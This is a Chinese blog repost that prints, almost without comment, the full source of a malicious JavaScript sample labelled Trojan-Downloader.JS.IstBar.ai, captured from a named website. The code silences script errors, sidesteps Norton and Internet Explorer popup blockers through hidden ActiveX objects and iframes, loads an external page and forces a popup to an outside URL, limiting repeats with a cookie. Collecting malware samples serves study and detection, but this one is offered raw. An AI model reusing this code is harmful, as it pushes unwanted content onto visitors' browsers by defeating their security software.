zoukankan
html css js c++ java
Trojan program TrojanDownloader.JS.IstBar.ai 病毒样本
//
detected: Trojan program Trojan-Downloader.JS.IstBar.ai URL: http://www.ffkan.com/js/newsp2.js
var
paypopupURL
=
"
http://www.m117.cn/?f
"
;
var
usingActiveX
=
true
;
function
blockError()
{
return
true
;}
window.onerror
=
blockError;
//
bypass norton internet security popup blocker
if
(window.SymRealWinOpen)
{window.open
=
SymRealWinOpen;}
if
(window.NS_ActualOpen)
{window.open
=
NS_ActualOpen;}
if
(
typeof
(usingClick)
==
'undefined')
{
var
usingClick
=
false
;}
if
(
typeof
(usingActiveX)
==
'undefined')
{
var
usingActiveX
=
false
;}
if
(
typeof
(popwin)
==
'undefined')
{
var
popwin
=
null
;}
if
(
typeof
(poped)
==
'undefined')
{
var
poped
=
false
;}
var
blk
=
1
;
var
setupClickSuccess
=
false
;
var
googleInUse
=
false
;
var
myurl
=
location.href
+
'
/
';
var
MAX_TRIED
=
20
;
var
activeXTried
=
false
;
var
tried
=
0
;
var
randkey
=
'
0
';
//
random key from server
var
myWindow;
var
popWindow;
var
setupActiveXSuccess
=
0
;
//
bypass IE functions
function
setupActiveX()
{
if
(usingActiveX)
{
try
{
if
(setupActiveXSuccess
<
5
)
{document.write('
<
DIV STYLE
=
"
display:none;
"
><
INPUT ID
=
"
autoHit
"
TYPE
=
"
TEXT
"
ONKEYPRESS
=
"
showActiveX()
"
></
DIV
>
');
popWindow
=
window.createPopup();
popWindow.document.body.innerHTML
=
'
<
DIV ID
=
"
objectRemover
"
><
OBJECT ID
=
"
getParentDiv
"
STYLE
=
"
position:absolute;top:0px;left:0px;
"
WIDTH
=
1
HEIGHT
=
1
DATA
=
"
http://www.resume-cn.com/firefox.htm
"
TYPE
=
"
text/html
"
></
OBJECT
></
DIV
>
';
//
error page
document.write('
<
IFRAME NAME
=
"
popIframe
"
STYLE
=
"
position:absolute;top:-100px;left:0px;1px;height:1px;
"
src
=
"
/about:blank
"
></
IFRAME
>
');
popIframe.document.write('
<
OBJECT ID
=
"
getParentFrame
"
STYLE
=
"
position:absolute;top:0px;left:0px;
"
WIDTH
=
1
HEIGHT
=
1
DATA
=
"
http://www.resume-cn.com/firefox.htm
"
TYPE
=
"
text/html
"
></
OBJECT
>
');
//
error page
setupActiveXSuccess
=
6
;}
}
catch
(e)
{
if
(setupActiveXSuccess
<
5
)
{setupActiveXSuccess
++
;setTimeout('setupActiveX();',
500
);}
else
if
(setupActiveXSuccess
==
5
)
{activeXTried
=
true
;setupClick();}
}
}
}
function
tryActiveX()
{
if
(
!
activeXTried
&&
!
poped)
{
if
(setupActiveXSuccess
==
6
&&
googleInUse
&&
popWindow
&&
popWindow.document.getElementById('getParentDiv')
&&
popWindow.document.getElementById('getParentDiv').object
&&
popWindow.document.getElementById('getParentDiv').object.parentWindow)
{
myWindow
=
popWindow.document.getElementById('getParentDiv').object.parentWindow;
}
else
if
(setupActiveXSuccess
==
6
&&
!
googleInUse
&&
popIframe
&&
popIframe.getParentFrame
&&
popIframe.getParentFrame.object
&&
popIframe.getParentFrame.object.parentWindow)
{
myWindow
=
popIframe.getParentFrame.object.parentWindow;
popIframe.location.replace('about:blank');
}
else
{setTimeout('tryActiveX()',
200
);
tried
++
;
if
(tried
>=
MAX_TRIED
&&
!
activeXTried)
{
activeXTried
=
true
;
setupClick();}
return
;
}
openActiveX();
window.windowFired
=
true
;self.focus();
}
}
function
openActiveX()
{
if
(
!
activeXTried
&&
!
poped)
{
if
(myWindow
&&
window.windowFired)
{
window.windowFired
=
false
;
document.getElementById('autoHit').fireEvent(
"
onkeypress
"
,(document.createEventObject().keyCode
=
escape(randkey).substring(
1
)));
}
else
{
setTimeout('openActiveX();',
100
);
}
tried
++
;
if
(tried
>=
MAX_TRIED)
{activeXTried
=
true
;setupClick();
}
}
}
function
showActiveX()
{
if
(
!
activeXTried
&&
!
poped)
{
if
(googleInUse)
{
window.daChildObject
=
popWindow.document.getElementById('objectRemover').children(
0
);
window.daChildObject
=
popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
}
newWindow
=
myWindow.open(paypopupURL,
"
abcdefg
"
,
"
width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes
"
);
if
(newWindow)
{newWindow.blur();self.focus();activeXTried
=
true
;poped
=
true
;}
else
{
if
(
!
googleInUse)
{googleInUse
=
true
;tried
=
0
;tryActiveX();}
else
{activeXTried
=
true
;setupClick();}
}
}
}
//
end bypass IE functions
//
normal call functions
function
paypopup()
{
if
(
!
poped)
{
if
(
!
usingClick
&&
!
usingActiveX)
{
popwin
=
window.open(paypopupURL,
"
abcdefg
"
,
"
width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes
"
);
if
(popwin)
{poped
=
true
;}
self.focus();}
}
if
(
!
poped)
{
if
(usingActiveX)
{tryActiveX();}
else
{setupClick();}
}
}
//
end normal call functions
//
onclick call functions
function
setupClick()
{
if
(
!
poped
&&
!
setupClickSuccess)
{
if
(window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick
=
document.onclick;document.onclick
=
gopop;self.focus();setupClickSuccess
=
true
;}
}
function
gopop()
{
if
(
!
poped)
{popwin
=
window.open(paypopupURL,
"
abcdefg
"
,
"
width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes
"
);
if
(popwin)
{poped
=
true
;}
self.focus();}
if
(
typeof
(prePaypopOnclick)
==
"
function
"
)
{prePaypopOnclick();}
}
//
end onclick call functions
//
check version
function
detectGoogle()
{
if
(usingActiveX)
{
try
{document.write('
<
DIV STYLE
=
"
display:none;
"
><
OBJECT ID
=
"
detectGoogle
"
CLASSID
=
"
clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB
"
STYLE
=
"
display:none;
"
CODEBASE
=
"
view-source:about:blank
"
></
OBJECT
></
DIV
>
');googleInUse
|=
(
typeof
(document.getElementById('detectGoogle'))
==
'object');}
catch
(e)
{setTimeout('detectGoogle();',
50
);}
}
}
function
version()
{
var
os
=
'W0';
var
bs
=
'I0';
var
isframe
=
false
;
var
browser
=
window.navigator.userAgent;
if
(browser.indexOf('Win')
!=
-
1
)
{os
=
'W1';}
if
(browser.indexOf(
"
SV1
"
)
!=
-
1
)
{bs
=
'I2';}
else
if
(browser.indexOf(
"
Opera
"
)
!=
-
1
)
{bs
=
"
I0
"
;}
else
if
(browser.indexOf(
"
Firefox
"
)
!=
-
1
)
{bs
=
"
I0
"
;}
else
if
(browser.indexOf(
"
Microsoft
"
)
!=
-
1
||
browser.indexOf(
"
MSIE
"
)
!=
-
1
)
{bs
=
'I1';}
if
(top.location
!=
this
.location)
{isframe
=
true
;}
paypopupURL
=
paypopupURL;
usingClick
=
blk
&&
((browser.indexOf(
"
SV1
"
)
!=
-
1
)
||
(browser.indexOf(
"
Opera
"
)
!=
-
1
)
||
(browser.indexOf(
"
Firefox
"
)
!=
-
1
));usingActiveX
=
blk
&&
(browser.indexOf(
"
SV1
"
)
!=
-
1
)
&&
!
(browser.indexOf(
"
Opera
"
)
!=
-
1
)
&&
((browser.indexOf(
"
Microsoft
"
)
!=
-
1
)
||
(browser.indexOf(
"
MSIE
"
)
!=
-
1
));detectGoogle();
}
version();
//
end check version
function
loadingPop()
{
if
(
!
usingClick
&&
!
usingActiveX)
{
paypopup();
}
else
if
(usingActiveX)
{tryActiveX();}
else
{setupClick();}
}
//
\\\\\\\\\\\\\\
function
GetCookie (name)
{
var
arg
=
name
+
"
=
"
;
var
alen
=
arg.length;
var
clen
=
document.cookie.length;
var
i
=
0
;
while
(i
<
clen)
{
var
j
=
i
+
alen;
if
(document.cookie.substring(i, j)
==
arg)
return
getCookieVal (j);
i
=
document.cookie.indexOf(
"
"
, i)
+
1
;
if
(i
==
0
)
break
;
}
return
null
;
}
function
SetCookie (name, value)
{
var
argv
=
SetCookie.arguments;
var
argc
=
SetCookie.arguments.length;
var
expires
=
(argc
>
2
)
?
argv[
2
] :
null
;
var
path
=
(argc
>
3
)
?
argv[
3
] :
null
;
var
domain
=
(argc
>
4
)
?
argv[
4
] :
null
;
var
secure
=
(argc
>
5
)
?
argv[
5
] :
false
;
document.cookie
=
name
+
"
=
"
+
escape (value)
+
((expires
==
null
)
?
""
: (
"
; expires=
"
+
expires.toGMTString()))
+
((path
==
null
)
?
""
: (
"
; path=
"
+
path))
+
((domain
==
null
)
?
""
: (
"
; domain=
"
+
domain))
+
((secure
==
true
)
?
"
; secure
"
:
""
);
}
function
DeleteCookie (name)
{
var
exp
=
new
Date();
exp.setTime (exp.getTime()
-
1
);
//
This cookie is history
var
cval
=
0
;
document.cookie
=
name
+
"
=
"
+
cval
+
"
; expires=
"
+
exp.toGMTString();
}
//
设置cookies时间,自己根据情况设置。
var
expDays
=
1
;
var
exp
=
new
Date();
exp.setTime(exp.getTime()
+
(expDays
*
6
*
60
*
60
*
1000
));
function
amt()
{
var
count
=
GetCookie('countsports');
//
同一ip只显示一次
//
var count;//同一ip只显示N次
//
alert(count);
//
count = null;
if
(count
==
null
)
{
SetCookie('countsports','
1
')
return
1
}
else
{
var
newcount
=
parseInt(count)
+
1
;
if
(newcount
<
2
) count
=
1
;
SetCookie('countsports',newcount,exp);
//
DeleteCookie('countsports')
return
newcount
}
}
function
getCookieVal(offset)
{
var
endstr
=
document.cookie.indexOf (
"
;
"
, offset);
if
(endstr
==
-
1
)
endstr
=
document.cookie.length;
return
unescape(document.cookie.substring(offset, endstr));
}
function
btpop()
{
if
(amt()
==
1
)
{
openWindowBack();
try
{
aryADSeq.push(
"
openWindowBack()
"
);
}
catch
(e)
{
openWindowBack();
}
}
}
function
openWindowBack()
{
myurl
=
myurl.substring(
0
, myurl.indexOf('
/
',
8
));
if
(myurl
==
'')
{myurl
=
'.';}
setupActiveX();
loadingPop();
//
self.focus();
}
btpop()
有时间分析一下
QQ:273352165 evlon#126.com 转载请注明出处。
查看全文
相关阅读:
使用Systrace分析UI性能
android官方推荐的网络调优器AT&T ARO
HttpResponseCache 网络缓存使用
SectionIndexer中的getSectionForPosition()与getPositionForSection()
MVVM_Android-CleanArchitecture
Android UI:机智的远程动态更新策略
Data Binding
Android实战之你应该使用哪个网络库?
View以自身中心旋转的代码解惑
为什么要使用puppet 及初步接触
原文地址:https://www.cnblogs.com/evlon/p/810447.html
最新文章
洛谷 P5664 Emiya 家今天的饭(84分)
洛谷 P1002 过河卒
Java 读写Properties配置文件
webx学习
Servlet学习
HTTP Session学习
Filter学习
Spring学习笔记IOC与AOP实例
Struts2框架学习(三) 数据处理
Struts2框架学习(二) Action
热门文章
20150929,所学整理
20150929作业——判断一个数是奇数还是偶数
20150928作业
输出多行字符的一个简单JAVA小程序
一个JAVA代码
JAVA编译中拒绝访问的问题及解决方案
Java环境的配置
迷宫移动
输入三个数比较大小
加速Android Studio/Gradle构建
Copyright © 2011-2022 走看看